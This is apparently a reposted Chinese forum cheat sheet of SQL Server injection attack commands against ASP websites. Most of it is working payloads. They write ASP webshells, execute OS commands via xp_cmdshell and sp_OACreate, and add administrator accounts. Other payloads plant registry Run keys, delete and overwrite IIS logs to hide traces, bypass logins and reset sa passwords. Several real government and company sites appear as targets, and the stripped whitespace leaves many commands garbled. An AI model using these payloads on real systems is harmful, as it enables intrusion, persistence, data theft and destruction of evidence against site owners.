`
omygege
  • 浏览: 1350077 次
文章分类
社区版块
存档分类
最新评论

注入攻击命令大全

 
阅读更多

转帖:http://bbs.pediy.com/showthread.php?t=110793

1、用^转义字符来写ASP(一句话木马)文件的方法:
?http://192.168.1.5/display.asp?keyno=1881;execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VBScriptrunat=server^>executerequest^("l"^)^</script^>>c:/mu.asp';--

?echo^<%execute^(request^("l"^)^)%^>>c:/mu.asp

2、显示SQL系统版本:
?http://192.168.1.5/display.asp?keyno=188and1=(select@@VERSION)
?http://www.xxxx.com/FullStory.asp?id=1and1=convert(int,@@version)--

MicrosoftVBScript编译器错误错误'800a03f6'
缺少'End'
/iisHelp/common/500-100.asp,行242
MicrosoftOLEDBProviderforODBCDrivers错误'80040e07'
[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue'MicrosoftSQLServer2000-8.00.760(IntelX86)Dec17200214:22:05Copyright(c)1988-2003MicrosoftCorporationDesktopEngineonWindowsNT5.0(Build2195:ServicePack4)'toacolumnofdatatypeint.
/display.asp,行17
3、在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用“in”关键字进行查询,例如“select*frommytablewhereidin(1)”,括号中的值就是我们提交的数据,它的结果与使用“select*frommytablewhereid=1”的查询结果完全相同。所以访问页面的时候在URL后面加上“)and1=1and1in(1”后原来的SQL语句就变成了“select*frommytablewhereidin(1)and1=1and1in(1)”,这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为“包含数字型”吧,聪明的你一定想到了还有“包含字符型”呢。对了,它就是由于类似“select*frommytablewherenamein('firstsee')”的查询语句造成的。

4、判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188and1=(selectcount(*)FROMmaster.dbo.sysobjectswherextype='X'ANDname='xp_cmdshell')
恢复xp_cmdshell扩展存储的命令:
http://www.test.com/news/show1.asp?NewsId=125272
;execmaster.dbo.sp_addextendedproc'xp_cmdshell','e:/inetput/web/xplog70.dll';--

5、向启动组中写入命令行和执行程序:
http://192.168.1.5/display.asp?keyno=188;EXECmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/Run','help1','REG_SZ','cmd.exe/cnetusertestptlove/add'


6、查看当前的数据库名称:
?http://192.168.1.5/display.asp?keyno=188and0<>db_name(n)n改成0,1,2,3……就可以跨库了
?http://www.xxxx.com/FullStory.asp?id=1and1=convert(int,db_name())--
MicrosoftVBScript编译器错误错误'800a03f6'
缺少'End'
/iisHelp/common/500-100.asp,行242
MicrosoftOLEDBProviderforODBCDrivers错误'80040e07'
[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue'huidahouse'toacolumnofdatatypeint.
/display.asp,行17
7、列出当前所有的数据库名称:
select*frommaster.dbo.sysdatabases列出所有列的记录
selectnamefrommaster.dbo.sysdatabases仅列出name列的记录

8、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令:
createTABLEmytmp(infoVARCHAR(400),IDintIDENTITY(1,1)NOTNULL)
DECLARE@shellINT
DECLARE@fsoINT
DECLARE@fileINT
DECLARE@isEndBIT
DECLARE@outVARCHAR(400)
EXECsp_oacreate'wscript.shell',@shelloutput
EXECsp_oamethod@shell,'run',null,'cmd.exe/cdirc:/>c:/temp.txt','0','true'
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。

EXECsp_oacreate'scripting.filesystemobject',@fsooutput
EXECsp_oamethod@fso,'opentextfile',@fileout,'c:/temp.txt'
--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌

WHILE@shell>0
BEGIN
EXECsp_oamethod@file,'Readline',@outout
insertINTOMYTMP(info)VALUES(@out)
EXECsp_oagetproperty@file,'AtEndOfStream',@isEndout
IF@isEnd=1BREAK
ELSECONTINUE
END

dropTABLEMYTMP

----------
DECLARE@shellINT
DECLARE@fsoINT
DECLARE@fileINT
DECLARE@isEndBIT
DECLARE@outVARCHAR(400)
EXECsp_oacreate'wscript.shell',@shelloutput
EXECsp_oamethod@shell,'run',null,'cmd.exe/ccscriptC:/Inetpub/AdminScripts/adsutil.vbsset/W3SVC/InProcessIsapiApps"C:/WINNT/system32/idq.dll""C:/WINNT/system32/inetsrv/httpext.dll""C:/WINNT/system32/inetsrv/httpodbc.dll""C:/WINNT/system32/inetsrv/ssinc.dll""C:/WINNT/system32/msw3prt.dll""C:/winnt/system32/inetsrv/asp.dll">c:/temp.txt','0','true'
EXECsp_oacreate'scripting.filesystemobject',@fsooutput
EXECsp_oamethod@fso,'opentextfile',@fileout,'c:/temp.txt'
WHILE@shell>0
BEGIN
EXECsp_oamethod@file,'Readline',@outout
insertINTOMYTMP(info)VALUES(@out)
EXECsp_oagetproperty@file,'AtEndOfStream',@isEndout
IF@isEnd=1BREAK
ELSECONTINUE
END

以下是一行里面将WEB用户加到管理员组中:
DECLARE@shellINTDECLARE@fsoINTDECLARE@fileINTDECLARE@isEndBITDECLARE@outVARCHAR(400)EXECsp_oacreate'wscript.shell',@shelloutputEXECsp_oamethod@shell,'run',null,'cmd.exe/ccscriptC:/Inetpub/AdminScripts/adsutil.vbsset/W3SVC/InProcessIsapiApps"C:/WINNT/system32/idq.dll""C:/WINNT/system32/inetsrv/httpext.dll""C:/WINNT/system32/inetsrv/httpodbc.dll""C:/WINNT/system32/inetsrv/ssinc.dll""C:/WINNT/system32/msw3prt.dll""C:/winnt/system32/inetsrv/asp.dll">c:/temp.txt','0','true'EXECsp_oacreate'scripting.filesystemobject',@fsooutputEXECsp_oamethod@fso,'opentextfile',@fileout,'c:/temp.txt'WHILE@shell>0BEGINEXECsp_oamethod@file,'Readline',@outoutinsertINTOMYTMP(info)VALUES(@out)EXECsp_oagetproperty@file,'AtEndOfStream',@isEndoutIF@isEnd=1BREAKELSECONTINUEEND

以下是一行中执行EXE程序:
DECLARE@shellINTDECLARE@fsoINTDECLARE@fileINTDECLARE@isEndBITDECLARE@outVARCHAR(400)EXECsp_oacreate'wscript.shell',@shelloutputEXECsp_oamethod@shell,'run',null,'cmd.exe/ccscript.exeE:/bjeea.net.cn/score/fts/images/iis.vbslh1c:/>c:/temp.txt','0','true'EXECsp_oacreate'scripting.filesystemobject',@fsooutputEXECsp_oamethod@fso,'opentextfile',@fileout,'c:/temp.txt'WHILE@shell>0BEGINEXECsp_oamethod@file,'Readline',@outoutinsertINTOMYTMP(info)VALUES(@out)EXECsp_oagetproperty@file,'AtEndOfStream',@isEndoutIF@isEnd=1BREAKELSECONTINUEEND

SQL下三种执行CMD命令的方法:

先删除7.18号日志:
(1)execmaster.dbo.xp_cmdshell'delC:/winnt/system32/logfiles/W3SVC5/ex050718.log>c:/temp.txt'

(2)DECLARE@shellINTDECLARE@fsoINTDECLARE@fileINTDECLARE@isEndBITDECLARE@outVARCHAR(400)EXECsp_oacreate'wscript.shell',@shelloutputEXECsp_oamethod@shell,'run',null,'cmd.exe/cdelC:/winnt/system32/logfiles/W3SVC5/ex050718.log>c:/temp.txt','0','true'EXECsp_oacreate'scripting.filesystemobject',@fsooutputEXECsp_oamethod@fso,'opentextfile',@fileout,'c:/temp.txt'WHILE@shell>0BEGINEXECsp_oamethod@file,'Readline',@outoutinsertINTOMYTMP(info)VALUES(@out)EXECsp_oagetproperty@file,'AtEndOfStream',@isEndoutIF@isEnd=1BREAKELSECONTINUEEND

(3)首先开启jet沙盘模式,通过扩展存储过程xp_regwrite修改注册表实现,管理员修改注册表不能预防的原因。出于安全原因,默认沙盘模式未开启,这就是为什么需要xp_regwrite的原因,而xp_regwrite至少需要DB_OWNER权限,为了方便,这里建议使用sysadmin权限测试:
?execmaster..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1
注:
0禁止一切(默认)
1使能访问ACCESS,但是禁止其它
2禁止访问ACCESS,但是使能其他
3使能一切

?这里仅给出sysadmin权限下使用的命令:
select*fromopenrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/ias.mdb','selectshell("cmd.exe/cnetuseradminadmin1234/add")')


?建立链接数据库'L0op8ack'参考命令:
EXECsp_addlinkedserver'L0op8ack','OLEDBProviderforJet','Microsoft.Jet.OLEDB.4.0','c:/windows/system32/ias/ias.mdb'

?如何使用链接数据库:

使用这个方式可以执行,但是很不幸,DB_OWNER权限是不够的,需要至少sysadmin权限或者securityadmin+setupadmin权限组合
sp_addlinkedserver需要sysadmin或setupadmin权限
sp_addlinkedsrvlogin需要sysadmin或securityadmin权限
最终发现,还是sa权限或者setupadmin+securityadmin权限帐户才能使用,
一般没有哪个管理员这么设置普通帐户权限的

实用性不强,仅作为一个学习总结吧

大致过程如下,如果不是sysadmin,那么IAS.mdb权限验证会出错,
我测试的时候授予hacker这个用户setupadmin+securityadmin权限,使用ias.mdb失败
需要找一个一般用户可访问的mdb才可以:

?新建链接服务器”L0op8ack”:EXECsp_addlinkedserver'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:/winnt/system32/ias/ias.mdb';--
?execsp_addlinkedsrvlogin'L0op8ack','false';--或
execsp_addlinkedsrvlogin'L0op8ack','false',NULL,'test1','ptlove';--
?select*FROMOPENQUERY(L0op8ack,'selectshell("cmd.exe/cnetuser")');--
?execsp_droplinkedsrvlogin'L0op8ack','false';--
?execsp_dropserver'L0op8ack';--

再考贝一个其它文件来代替7.18日文件:
(1)execmaster.dbo.xp_cmdshell'copyC:/winnt/system32/logfiles/W3SVC5/ex050716.logC:/winnt/system32/logfiles/W3SVC5/ex050718.log>c:/temp.txt'

(2)DECLARE@shellINTDECLARE@fsoINTDECLARE@fileINTDECLARE@isEndBITDECLARE@outVARCHAR(400)EXECsp_oacreate'wscript.shell',@shelloutputEXECsp_oamethod@shell,'run',null,'cmd.exe/ccopyC:/winnt/system32/logfiles/W3SVC5/ex050716.logC:/winnt/system32/logfiles/W3SVC5/ex050718.log>c:/temp.txt','0','true'EXECsp_oacreate'scripting.filesystemobject',@fsooutputEXECsp_oamethod@fso,'opentextfile',@fileout,'c:/temp.txt'WHILE@shell>0BEGINEXECsp_oamethod@file,'Readline',@outoutinsertINTOMYTMP(info)VALUES(@out)EXECsp_oagetproperty@file,'AtEndOfStream',@isEndoutIF@isEnd=1BREAKELSECONTINUEEND

(3)DECLARE@shellINTDECLARE@fsoINTDECLARE@fileINTDECLARE@isEndBITDECLARE@outVARCHAR(400)EXECsp_oacreate'wscript.shell',@shelloutputEXECsp_oamethod@shell,'run',null,'cmd.exe/cnetuser>c:/temp.txt','0','true'EXECsp_oacreate'scripting.filesystemobject',@fsooutputEXECsp_oamethod@fso,'opentextfile',@fileout,'c:/temp.txt'WHILE@shell>0BEGINEXECsp_oamethod@file,'Readline',@outoutinsertINTOMYTMP(info)VALUES(@out)EXECsp_oagetproperty@file,'AtEndOfStream',@isEndoutIF@isEnd=1BREAKELSECONTINUEEND

9、用update来更新表中的数据:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;updateupload.dbo.adminsetpwd='a0b923820dcc509a'whereusername='www';--
www用户密码的16位MD5值为:a0b923820dcc509a,即把密码改成1;
32位MD5值为:,密码为

10、利用表内容导成文件功能
SQL有BCP命令,它可以把表的内容导成文本文件并放到指定位置。利用这项功能,我们可以先建一张临时表,然后在表中一行一行地输入一个ASP木马,然后用BCP命令导出形成ASP文件。
命令行格式如下:
bcp"select*fromtemp"queryoutc:/inetpub/wwwroot/runcommand.asp–c–Slocalhost–Usa–Pupload('S'参数为执行查询的服务器,'U'参数为用户名,'P'参数为密码,最终上传了一个runcommand.asp的木马)。

11、创建表、播入数据和读取数据的方法
?创建表:
'and1=1unionselect1,2,3,4;createtable[dbo].[cyfd]([gyfd][char](255))--
?往表里播入数据:
'and1=1unionselect1,2,3,4;DECLARE@resultvarchar(255)selecttop1namefromupload.dbo.sysobjectswherextype='U'andstatus>0,@resultoutputinsertintocyfd(gyfd)values(@result);--
'and1=1unionselect1,2,3,4;DECLARE@resultvarchar(255)execmaster.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM/CONTROLSet001/Services/W3SVC/Parameters/VirtualRoots','/',@resultoutputinsertintocyfd(gyfd)values(@result);--
?从表里读取数据:
'and1=(selectcount(*)fromcyfdwheregyfd>1)--

?删除临时表:
';droptablecyfd;--

12、通过SQL语句直接更改sa的密码:
?updatemaster.dbo.sysxloginssetpassword=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FCwheresid=0x01,这样sa的密码就被我们改成了111111拉。呵呵,解决的方法就是把sa给删拉。,怎么删可以参考我的《完全删除sa这个后门》。

?查看本机所有的数据库用户名:
select*frommaster.dbo.sysxlogins
selectname,sid,password,dbidfrommaster.dbo.sysxlogins

?更改sa口令方法:用sql综合利用工具连接后,执行命令:
execsp_passwordNULL,'新密码','sa'

13、查询dvbbs库中所有的表名和表结构:
?select*fromdvbbs.dbo.sysobjectswherextype='U'andstatus>0
?select*fromdvbbs.dbo.syscolumnswhereid=1426104121

14、手工备份当前数据库:
完全备份:
;declare@asysname,@snvarchar(4000)
select@a=db_name(),@s='c:/db1'backupdatabase@atodisk=@sWITHformAT--
差异备份:
;declare@asysname,@snvarchar(4000)
select@a=db_name(),@s='c:/db1'backupdatabase@atodisk=@sWITHDIFFERENTIAL,formAT—

15、添加和删除一个SA权限的用户test:
execmaster.dbo.sp_addlogintest,ptlove
execmaster.dbo.sp_addsrvrolemembertest,sysadmin

cmd.exe/cisql-E/Ualma/P/iK:/test.qry

16、select*fromChouYFD.dbo.sysobjectswherextype='U'andstatus>0
就可以列出库ChouYFD中所有的用户建立的表名。
selectname,idfromChouYFD.dbo.sysobjectswherextype='U'andstatus>0

17、
?http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select*fromrdweb.dbo.syscolumns(whereid=1234)
列出rdweb库中所有表中的字段名称
?select*fromdvbbs.dbo.syscolumnswhereid=5575058
列出库dvbbs中表id=5575058的所有字段名

18、删除记录命令:deletefromDv_topicwhereboardid=5andtopicid=7978

19、绕过登录验证进入后台的方法整理:
1)'or''='
2)'or1=1--
3)'or'a'='a--
4)'or'='or'
5)"or1=1--
6)or1=1--
7)or'a='a
8)"or"a"="a
9)')or('a'='a
10)")or("a"="a
11))or(1=1
12)'or''='
13)人气%'and1=1and'%'='

20、寻找网站路径的方法汇总:
1)查看WEB网站安装目录命令:
?cscriptc:/inetpub/adminscripts/adsutil.vbsenumw3svc/2/root>c:/test1.txt(将2换成1、3、4、5试试)
typec:/test1.txt
delc:/test1.txt
在NBSI下可以直接显示运行结果,所以不用导出到文件

2)在网站上随便找到一个图片的名字123.jpg
然后写进批处理程序123.bat:
d:
dir123.jpg/s>c:/123.txt
e:
dir123.jpg/s>>c:/123.txt
f:
dir123.jpg/s>>c:/123.txt

执行后typec:/123.txt
这样来分析网站的路径

3)SQL服务器和网站服务器在同一个服务器上,好了是可以执行命令是吧?
将执行命令输出结果到
%windir%/help/iishelp/common/404b.htm或者500.asp
注意输出前Backup这两个文件
如:
dirc:/>%windir%/help/iishelp/common/404b.htm
然后随便输入一个文件来访问:http://目标ip/2.asp

4)针对win2000系统:xp_regread读取HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/W3SVC/Parameters/VirtualRoots获取WEB路径
2003系统:xp_regread读取,未找到方法
如:
(1)新建一个表cyfd(字段为gyfd):http://www.cnwill.com/NewsShow.aspx?id=4844;createtable[dbo].[cyfd]([gyfd][char](255))--
(2)把web路径写进去:http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE@resultvarchar(255)execmaster.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM/CONTROLSet001/Services/W3SVC/Parameters/VirtualRoots','/',@resultoutputinsertintocyfd(gyfd)values(@result);--
(3)还是让他不匹配,显示错误:http://www.cnwill.com/NewsShow.aspx?id=4844and1=(selectcount(*)fromcyfdwheregyfd>1)
Source:.NetSqlClientDataProvider
Description:将varchar值'Y:/Web/烟台人才热线后台管理系统,,201'转换为数据类型为int的列时发生语法错误。
TargeSite:BooleanRead()哈哈哈。。路径暴露了。。
(4)接下来删除表:http://www.cnwill.com/NewsShow.aspx?id=4844;droptablecyfd;--

5)用regedit命令导出注册表,将导出的结果保存的路径到%windir%/help/iishelp/common/404b.htm或者500.asp页面
regedit命令说明:
Regedit/L:system/R:user/Efilename.regRegpath
参数含义:
/L:system指定System.dat文件所在的路径。
/R:user指定User.dat文件所在的路径。
/E:此参数指定注册表编辑器要进行导出注册表操作,在此参数后面空一格,输入导出注册表的文件名。
Regpath:用来指定要导出哪个注册表的分支,如果不指定,则将导出全部注册表分支。在这些参数中,"/L:system"和"/R:user"参数是可选项,如果不使用这两个参数,注册表编辑器则认为是对WINDOWS目录下的"system.dat"和"user.dat"文件进行操作。如果是通过从软盘启动并进入DOS,那么就必须使用"/L"和"/R"参数来指定"system.dat"和"user.dat"文件的具体路径,否则注册表编辑器将无法找到它们。比如说,如果通过启动盘进入DOS,则备份注册表的命令是"Regedit/L:C:/windows//R:C:/windows//eregedit.reg",该命令的意思是把整个注册表备份到WINDOWS目录下,其文件名为"regedit.reg"。而如果输入的是"regedit/ED:/regedit.reg"这条命令,则是说把整个注册表备份到D盘的根目录下(省略了"/L"和"/R"参数),其文件名为"Regedit.reg"。

regedit/sc:/adam.reg(导入c:/adam.reg文件至注册表)
regedit/ec:/web.reg(备份全部注册内容到c:/web.reg中)
针对win2000系统:C:/>regedit/e%windir%/help/iishelp/common/404b.htm"HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/W3SVC/Parameters/VirtualRoots"
然后http://目标IP/2.asp
针对win2003系统:没有找到,希望找到的朋友公布出来一起讨论。

6)虚拟主机下%SystemRoot%/system32/inetsrv/MetaBack/下的文件是iis的备份文件,是允许web用户访问的,如果你的iis备份到这里,用webshell下载下来后用记事本打开,可以获取对应的域名和web绝对路径。

7)SQL注入建立虚拟目录,有dbo权限下找不到web绝对路径的一种解决办法:
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
?建立虚拟目录win,指向c:/winnt/system32:execmaster.dbo.xp_cmdshell'cscriptC:/inetpub/AdminScripts/mkwebdir.vbs-clocalhost-w"l"-v"win","c:/winnt/system32"'
?让win目录具有解析asp脚本权限:execmaster.dbo.xp_cmdshell'cscriptC:/inetpub/AdminScripts/adsutil.vbssetw3svc/1/root/win/Accessexecute"true"–s:'
?删除虚拟目录win:execmaster.dbo.xp_cmdshell'cscriptC:/inetpub/AdminScripts/adsutil.vbsdeletew3svc/1/root/win/'
?测试:http://127.0.0.1/win/test.asp
8)利用SQL语句来查找WEB目录:根据经验,猜疑WEB根目录的顺序是:d盘、e盘、c盘,首先我们建立一个临时表用于存放master..xp_dirtree(适合于public)生成的目录树,用以下语句:
;createtabletemp(dirnvarchar(255),depthvarchar(255));--,该表的dir字段表示目录的名称,depth字段表示目录的深度。然后执行xp_dirtree获得D盘的目录树,语句如下:
;inserttemp(dir,depth)execmaster.dbo.xp_dirtree'd:';--

在进行下面的操作前,先查看D盘有几个文件夹,这样对D盘有个大致的了解,语句如下:
and(selectcount(*)fromtempwheredepth=1anddirnotin('DocumentsandSettings','ProgramFiles','RECYCLER','SystemVolumeInformation','WINDOWS','CAConfig','wmpub','MicrosoftUAM卷'))>=数字(数字=0、1、2、3...)

接着,我们在对方的网站上找几个一级子目录,如user、photo,然后,用筛选的方法来判断WEB根目录上是否存在此盘上,语句如下:
and(selectcount(*)fromtempwheredir<>'user')<(selectcount(*)fromtemp)

看语句的返回结果,如果为真,表示WEB根目录有可能在此盘上,为了进一步确认,多测试几个子目录:
and(selectcount(*)fromtempwheredir<>'photo')<(selectcount(*)fromtemp)

...

如果所有的测试结果都为真,表示WEB根目录很有可能在此盘上。

下面假设找到的WEB根目录在此盘上,用以下的语句来获得一级子目录的深度:
and(selectdepthfromtempwheredir='user')>=数字(数字=1、2、3...)

假设得到的depth是3,说明user目录是D盘的3级目录,则WEB根目录是D盘的二级目录。

目前我们已经知道了根目录所在的盘符和深度,要找到根目录的具体位置,我们来从D盘根目录开始逐一搜寻,当然,没有必要知道每个目录的名称,否则太耗费时间了。

接下来,另外建立一个临时表,用来存放D盘的1级子目录下的所有目录,语句如下:

;createtabletemp1(dirnvarchar(255),depthvarchar(255));--

然后把从D盘的第一个子目录下的所有目录存到temp1中,语句如下:
declare@dirnamevarchar(255);set@dirname='d:/'+(selecttop1dirfrom(selecttop1dirfromtempwheredepth=1anddirnotin('DocumentsandSettings','ProgramFiles','RECYCLER','SystemVolumeInformation','WINDOWS','CAConfig','wmpub','MicrosoftUAM卷')orderbydirdesc)Torderbydir);insertintotemp1execmaster.dbo.xp_dirtree@dirname
当然也可以把D盘的第二个子目录下的所有目录存到temp1中,只需把第二个top1改为top2就行了。

现在,temp1中已经保存了所有D盘第一级子目录下的所有目录,然后,我们用同样的方法来判断根目录是否在此一级子目录下:
and(selectcount(*)fromtemp1wheredir<>'user')<(selectcount(*)fromtemp1)
如果返回为真,表示根目录可能在此子目录下,记住要多测试几个例子,如果都返回为假,则表明WEB根目录不在此目录下,然后我们在用同样的方法来获得D盘第2、3...个子目录下的所有目录列表,来判断WEB根目录是否在其下。但是,要注意,用xp_dirtree前一定要把temp1表中的内容删除。

现在假设,WEB根目录在D盘的第一级子目录下,该子目录名称为website,怎样获得这个目录的名称我想不用我说了吧。因为前面我们知道了WEB根目录的深度为2,我们需要知道website下到底哪个才是真正的WEB根目录。

现在,我们用同样的方法,再建立第3个临时表:
;createtabletemp2(dirnvarchar(255),depthvarchar(255));--

然后把从D盘的website下的所有目录存到temp2中,语句如下:
declare@dirnamevarchar(255);set@dirname='d:/website/'+(selecttop1dirfrom(selecttop1dirfromtemp1wheredepth=1anddirnotin('DocumentsandSettings','ProgramFiles','RECYCLER','SystemVolumeInformation','WINDOWS','CAConfig','wmpub','MicrosoftUAM卷')orderbydirdesc)Torderbydir);insertintotemp2execmaster.dbo.xp_dirtree@dirname
当然也可以把D盘的website下第二个子目录下的所有目录存到temp2中,只需把第二个top1改为top2就行了。

现在,我们用同样的方法判断该目录是否为根目录:
and(selectcount(*)fromtemp2wheredir<>'user')<(selectcount(*)fromtemp2)
如果返回为真,为了确定我们的判断,多测试几个例子,方法上面都讲到了,如果多个例子都返回为真,那么就确定了该目录为WEB根目录。


用以上的方法基本上可以获得WEB根目录,现在我们假设WEB根目录是:D:/website/www
然后,我们就可以备份当前数据库到这个目录下用来下载。备份前我们把temp、temp1、temp2的内容清空,然后C、D、E盘的目录树分别存到temp、temp1、temp2中。

下载完数据库后要记得把三个临时表drop掉,现在我们在下载的数据库中可以找到所有的目录列表,包括后台管理的目录以及更多信息。

21、win2000下将WEB用户提升为系统用户权限,需要有管理员的权限才能执行:
c:/>cscriptC:/Inetpub/AdminScripts/adsutil.vbsset/W3SVC/InProcessIsapiApps"C:/WINNT/system32/idq.dll""C:/WINNT/system32/inetsrv/httpext.dll""C:/WINNT/system32/inetsrv/httpodbc.dll""C:/WINNT/system32/inetsrv/ssinc.dll""C:/WINNT/system32/msw3prt.dll""C:/winnt/system32/inetsrv/asp.dll"

cscriptC:/Inetpub/AdminScripts/adsutil.vbsset/W3SVC/InProcessIsapiApps"C:/windows/system32/idq.dll""C:/windows/system32/inetsrv/httpext.dll""C:/windows/system32/inetsrv/httpodbc.dll""C:/windows/system32/inetsrv/ssinc.dll""C:/windows/system32/msw3prt.dll""C:/windows/system32/inetsrv/asp.dll"

查看是否成功:
c:/>cscriptC:/Inetpub/AdminScripts/adsutil.vbsgetw3svc/inprocessisapiapps

Microsoft(R)WindowsScriptHostVersion5.6
版权所有(C)MicrosoftCorporation1996-2001。保留所有权利。
inprocessisapiapps:(LIST)(6Items)
"C:/WINNT/system32/idq.dll"
"C:/WINNT/system32/inetsrv/httpext.dll"
"C:/WINNT/system32/inetsrv/httpodbc.dll"
"C:/WINNT/system32/inetsrv/ssinc.dll"
"C:/WINNT/system32/msw3prt.dll"
"c:/winnt/system32/inetsrv/asp.dll"

22、如何隐藏ASP木马:
建立非标准目录:mkdirimages../
拷贝ASP木马至目录:copyc:/inetpub/wwwroot/dbm6.aspc:/inetpub/wwwroot/images../news.asp
通过web访问ASP木马:http://ip/images../news.asp?action=login
如何删除非标准目录:rmdirimages..//s

23、去掉tenlnet的ntlm认证:
;execmaster.dbo.xp_cmdshell'tlntadmnconfigsec=-ntlm'—

24、用echo写入文件下载脚本iget.vbs:
(1)echoSetx=createObject(^"Microsoft.XMLHTTP^"):x.Open^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Sets=createObject(^"ADODB.Stream^"):s.Mode=3:s.Type=1:s.Open():s.Write(x.responseBody):s.SaveToFileLCase(WScript.Arguments(1)),2>c:/iget.vbs

(2)c:/>cscriptiget.vbshttp://127.0.0.1/asp/dbm6.aspdbm6.asp


25、手工建立IIS隐藏目录的方法:
?查看本地虚拟目录列表:cscript.exec:/inetpub/AdminScripts/adsutil.vbsenumw3svc/1/root
?新建一个kiss目录:mkdirc:/asp/kiss
?建立kiss虚拟目录:cscript.exec:/inetpub/AdminScripts/mkwebdir.vbs-cMyComputer-w"DefaultWebSite"-v"kiss","c:/asp/kiss"
?为kiss目录加执行和写权限:
cscript.exec:/inetpub/AdminScripts/adsutil.vbssetw3svc/1/root/kiss/kiss/accesswrite"true"-s:
cscript.exec:/inetpub/AdminScripts/adsutil.vbssetw3svc/1/root/kiss/accessexecute"true"-s:
??:Cscriptc:/inetpub/AdminScripts/adsutil.vbsset/w3svc/1/root/kiss/createprocessasuserfalse
?访问:http://127.0.0.1/kiss/test.asp

26、使用openrowset()连回本地做测试:
selecta.*
FROMOPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select*FROM[dvbbs].[dbo].[dv_admin]')ASa

select*FROMOPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select*FROM[dvbbs].[dbo].[dv_admin]')

27、获得主机名:
http://www.xxxx.com/FullStory.asp?id=1and1=convert(int,@@servername)--
selectconvert(int,@@servername)
select@@servername

28、获得数据库用户名:
http://www.XXXX.com/FullStory.asp?id=1and1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49anduser>0
selectuser

29、普通用户获得WEBSHELL的方法之二:
?打包:
EXEC[master].[dbo].[xp_makecab]'c:/test.rar','default',1,'d:/cmd.asp'
解包,可以用于得到webshell:
?EXEC[master].[dbo].[xp_unpackcab]'C:/test.rar','c:',1,'n.asp'
?读任意文件内容,要求有master的dbo权限:
EXEC[master].[dbo].[xp_readerrorlog]1,'c:/cmd.asp'

30、sa权限下已知web路径直接备份数据库到web路径下

http://www.XXXX.com/FullStory.asp?id=1;backuupdatabase数据库名todisk='c:/inetpub/wwwroot/save.db'则把得到的数据内容全部备份到WEB目录下,再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。

?遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:temp
http://www.XXXX.com/FullStory.asp?id=1;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
? 接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;inserttempexecmaster.dbo.xp_availablemedia;--
?我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id)execmaster.dbo.xp_subdirs'c:/';--
?我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:/';--这样就可以成功的浏览到所有的目录(文件夹)列表
?如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:/web/index.asp';--
?使用'bulkinsert'语法可以将一个文本文件插入到一个临时表中。如:bulkinserttemp(id)from'c:/inetpub/wwwroot/index.asp'浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。

31、一些sql中的扩展存储的总结:
xp_availablemedia显示系统上可用的盘符'C:/'xp_availablemedia
xp_enumgroups列出当前系统的使用群组及其说明xp_enumgroups
xp_enumdsn列出系统上已经设置好的ODBC数据源名称xp_enumdsn
xp_dirtree显示某个目录下的子目录与文件架构xp_dirtree'C:/inetpub/wwwroot/'
xp_getfiledetails获取某文件的相关属性xp_getfiledetails'C:/inetpub/wwwroot.asp'
dbp.xp_makecab将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开dbp.xp_makecab'C:/lin.cab','evil',1,'C:/inetpub/mdb.asp'
xp_unpackcab解压缩xp_unpackcab'C:/hackway.cab','C:/temp',1
xp_ntsec_enumdomains列出服务器域名xp_ntsec_enumdomains
xp_servicecontrol停止或者启动某个服务xp_servicecontrol'stop','schedule'
xp_terminate_process用pid来停止某个执行中的程序xp_terminate_process123
dbo.xp_subdirs只列某个目录下的子目录dbo.xp_subdirs'C:/'

32、
USEMASTER
GO
createprocsp_MSforeachObject
@objectTypeint=1,
@command1nvarchar(2000),
@replacecharnchar(1)=N'?',
@command2nvarchar(2000)=null,
@command3nvarchar(2000)=null,
@whereandnvarchar(2000)=null,
@precommandnvarchar(2000)=null,
@postcommandnvarchar(2000)=null
as
